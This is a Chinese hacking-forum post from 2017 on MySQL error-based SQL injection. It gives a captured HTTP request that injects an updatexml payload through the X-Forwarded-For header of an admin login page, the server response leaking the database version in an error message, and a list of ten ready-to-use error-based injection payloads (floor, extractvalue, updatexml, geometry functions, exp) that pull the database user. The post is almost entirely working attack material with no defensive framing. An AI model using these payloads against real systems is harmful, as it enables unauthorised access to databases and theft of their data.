mysql 报错注入-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

mysql 报错注入

[复制链接]
发表于 2017-4-11 11:32:52 | 显示全部楼层 |阅读模式
  1. POST /Model/admin/login.php?action=login HTTP/1.1
  2. Host: XXX.com
  3. X-Forwarded-For: ' or updatexml(1,concat(0x7e,(version())),0) or'
  4. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  6. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  7. Accept-Encoding: gzip, deflate
  8. Referer: http://XXX.com/Model/admin/login.php
  9. Cookie: PHPSESSID=i2m9hu9jtm8l4o71hvct9h0h05
  10. Connection: close
  11. Upgrade-Insecure-Requests: 1
  12. Content-Type: application/x-www-form-urlencoded
  13. Content-Length: 25

  14. username=abc&password=123
复制代码
返回包
  1. HTTP/1.1 200 OK
  2. Server: kangle/3.5.8.2
  3. Date: Tue, 11 Apr 2017 03:21:49 GMT
  4. X-Powered-By: PHP/5.4.45
  5. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  6. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  7. Pragma: no-cache
  8. Content-type: text/html
  9. Connection: close
  10. Content-Length: 540

  11. 
  12. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  13. <html xmlns="http://www.w3.org/1999/xhtml">
  14. <head>
  15. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />MySQL Query:insert into dg_logs(adminid,admin,type,addtime,ip,memo) values('22','abc','0','1491880909','' or updatexml(1,concat(0x7e,(version())),0) or'','管理员abc登录后台') <br> MySQL Error:XPATH syntax error: '~10.1.16-MariaDB' <br> MySQL Errno:1105 <br> Message:MySQL Query Error
复制代码

1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表